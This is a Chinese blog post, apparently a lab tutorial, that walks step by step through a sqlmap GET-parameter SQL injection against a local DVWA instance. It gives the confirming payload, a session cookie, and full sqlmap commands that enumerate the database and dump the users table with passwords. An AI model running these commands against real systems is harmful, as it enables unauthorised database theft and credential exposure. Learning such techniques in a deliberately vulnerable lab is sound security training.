SQLMAP 脱库过程(get请求)

最新推荐文章于 2023-11-14 14:06:06 发布
最新推荐文章于 2023-11-14 14:06:06 发布
阅读量1.8k 收藏 4
点赞数 1
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41092600/article/details/104286423
版权

一、准备工作

1、sqlmap为python语言开发,因此需要具备python环境。

2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过)

二、环境搭建

1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA

2、以DVMA的sql注入为例(DVMA安全级别为low),进行详细介绍。

三、get请求脱库

1、访问链接“http://192.168.200.130/DVWA/vulnerabilities/sqli/” User ID输入“1' or 1=1#” ,发现存在注入,如下图。因此使用sqlmap进行拖库。待测试链接为“http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

2、进入sqlmap目录,运行python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#",发现跳转到登录页面,因此需要获取cookie,以做进一步测试

3、获取cookie信息,可使用burp抓包工具,也可使用浏览器的“审查模式”等,本次cookie为{"PHPSESSID":"qvpbe3kltkk92e8ak63pjsnu2n","security":"low"}

4、添加cookie信息,继续sqlmap测试,运行python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=qvpbe3kltkk92e8ak63pjsnu2n;security=low",可发现id存在注入,同时得到数据库类型为Mysql等信息

5、获取当前数据库 --current-db参数,即python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=qvpbe3kltkk92e8ak63pjsnu2n;security=low" --batch --current-db

分析出当前数据库为dvwa

6、获取当前数据库下的表 --tables参数 即python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=qvpbe3kltkk92e8ak63pjsnu2n;security=low" --batch -D dvwa --tables

(-D:指定数据库名)

可发现,运行结果后,有两个表,分别是guestbook、users

7、获取指定表的列属性 --columns参数 即:python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=qvpbe3kltkk92e8ak63pjsnu2n;security=low" --batch -D dvwa -T users --columns

(-D:指定数据库名,-T:指定表名)

运行结果后,存在8个列属性,如下图所示。

8、正式拖库 --dump参数,即python sqlmap.py -u "http://192.168.200.130/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=qvpbe3kltkk92e8ak63pjsnu2n;security=low" --batch -D dvwa -T users -C "user,avatar,password,user_id" --dump

(-D:指定数据库名,-T:指定表名,-C:指定需要的列名,--dump代表下载)

可发现,已将相关信息下载到“/Users/***/.sqlmap/output/192.168.200.130/dump/dvwa/users.csv”目录下。

成功完成get请求注入的脱库。

 

doubboCode
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第三节 Sqlmap 请求参数设置-01
09-15
第三节 Sqlmap 请求参数设置-01
脱库了解一下
10-14
适用于小白,和开发人员了解的网络安全知识,防sql注入风险。
sqlmap get方式
最新发布
maosaiwei的博客
11-14 119
python sqlmap.py --random-agent -u "地址" --batch --dbs 清缓存 --fresh-queries。
sqlmap--GET类型
weixin_52805034的博客
09-09 507
基于sqli lab注入靶场-——sqlmap演示
KALI下Sqlmap工具使用方法之GET方法篇:
Liu_Bruce的博客
09-11 3181
大家好,今天做了SQL注入漏洞的实验。工具是大家熟悉的SqlmapSqlmap是一款开源的SQL注入漏洞检测与利用神器,没有之一。测试平台是漏洞扫描工具AWVS的测试平台:http://testphp.vulnweb.com,kali系统。 先简单介绍一下Sqlmap工具,这款工具堪称神器,因为支持众多数据库:MySQL,Oracle,PostgreSQL,Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite,Firebird,Sy...
脱库&站库分离渗透&解决MySQL禁止外连
热门推荐
Love&Share
11-22 1万+
文章目录打包数据库文件SQL语句打包数据库MySQLSQL server使用工具打包数据库站库分离渗透站库分离判断方法站库分离利用思路推荐阅读站库分离打包数据库解决MySQL禁止外连蚁剑Navicat tunnel隧道 打包数据库文件 access 数据库:mdb格式直接下载 MySQL数据库:在路径mysql/data/下存放所有数据库,直接将文件夹复制到web目录tar打包下载 mssql数据库:msdbdata.mdf msdblog.ldf 两个文件复制,直接下载 SQL语句打包.
撞库、脱库和洗库
GMaya的博客
04-24 9126
撞库 “撞库”一般就是指黑客拿到已经泄露的用户信息,然后去各个网站进行登录,一旦你的账号密码在各个网站都一样,那么就相当于撞库成功。 建议:各个网站的登录账号和密码不要一样。 脱库 “拖库”就是黑客通过技术手段,盗取数据库信息的过程。 建议:做防sql注入,文件上传漏洞等。 洗库 “洗库”就是将得到的数据信息进行贩卖。变现。 ...
Sqlmap命令使用
一醉一休的博客
02-27 4071
Sqlmap基本命令使用,总结常用23条命令
脱库和删库的实践及解决方案
深耕安全技术研究
02-03 4900
文章目录1.定义2.影响3.解决方案4.结论 1.定义 脱库:它属于来自外部恶意攻击。 删库:它属于是来自内部开发或运维人员的bug。 2.影响 但是在项目的业务是十分复杂,在一些紧急情况下还是很难避免需要直接操作数据库进行调试。 只要时间跨度足够长,运维及开发人员操作数据库就肯出现疏忽的很大可能性。 而且在我们开发项目的业务中还会出现各种各样的可能,包括活动漏洞数值漏洞等等,导致需要回档的运营事故并不罕见。 3.解决方案 就是生产环境的数据库不允许直接操作,不提供和不使用任何数据库管理工具或者命令行工具。
打开脱裤后的数据库文件
08-14
打开脱裤后的数据库文件,打开之前尽量先了解什么格式
第五节 Sqlmap 请求参数设置3-01
09-15
第五节 Sqlmap 请求参数设置3-01
第四节 Sqlmap 请求参数设置2-01
09-15
第四节 Sqlmap 请求参数设置2-01
第七节 Sqlmap 请求参数设置5-01
09-15
第七节 Sqlmap 请求参数设置5-01
第六节 Sqlmap 请求参数设置4-01
09-15
第六节 Sqlmap 请求参数设置4-01
sqlmap学习(二)设置请求参数
rane的博客
03-22 579
1、sqlmap设置HTTP方法 sqlmap会自动在探测过程中使用适合的HTTP 请求方法,但是在某些情况下,需要强制使用具体的HTTP请求方法,例如PUT请求方法。PUT请求方法不会自动使用,因此需要强制指定。使用 --method=PUT 2、sqlmap设置post提交参数 以Less11为例 开启burpsuite 输入用户名和密码后 3、sqlmap设置参数分隔符 4、sqlmap...
(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法
05-31 793
sqlmap注入】sqli-labs7
sql注入及其工具sqlmap的使用(小白)
weixin_45761012的博客
04-14 220
关于sql注入的问题(小白) 第一是关于工具:sqlmap; 对于一个网站是否存在sql注入漏洞,我们可以通过在参数后面加’ 看是否闭合,从而判断是否存在sql注入。 然后我们就发现报错到这里我们就使用sqlmap来进行扫描。 语法为python sqlmap,py -u ""然后我们就发现acuart存在get方式的注入,数据库为MySQL。然后我们查看用户 在url后面加上–users然后再对...
SQLMAP 脱库过程(post请求,三种方法)
qq_41092600的博客
02-12 4968
一、准备工作 1、sqlmap为python语言开发,因此需要具备python环境。 2、python环境搭建及sqlmap下载,可参考其他文章。(很多也很全,这个不是本文重点,因此略过) 二、环境搭建 1、本人使用的是Mac、windows7虚拟机,windows7中部署DVMA 2、以DVMA的sql注入为例(DVMA安全级别为medium),进行详细介绍。 三、post请求脱库(...
get和post的sqlmap验证
05-30
对于SQL注入漏洞的验证,SQLmap支持通过GET和POST方法发送HTTP请求。对于GET方法,SQLmap会在URL中自动添加注入语句;对于POST方法,SQLmap会在请求体中添加注入语句。 下面是使用SQLmap进行GET和POST方法注入漏洞验证的步骤: 1. 验证GET方法注入漏洞: ``` sqlmap -u "http://example.com/test.php?id=1" --dbs ``` 其中,`-u`参数指定目标URL,`--dbs`参数用于获取数据库信息。SQLmap会自动在URL中添加注入语句进行验证。 2. 验证POST方法注入漏洞: ``` sqlmap -u "http://example.com/test.php" --data "id=1" --dbs ``` 其中,`--data`参数用于指定POST请求体中的参数,`--dbs`参数用于获取数据库信息。SQLmap会自动在请求体中添加注入语句进行验证。 注意,对于POST方法,如果请求体中有多个参数,需要使用`--data`参数指定所有参数,例如: ``` sqlmap -u "http://example.com/test.php" --data "id=1&name=test" --dbs ``` 以上是SQLmap验证GET和POST方法注入漏洞的基本步骤,具体使用方法可以参考SQLmap官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值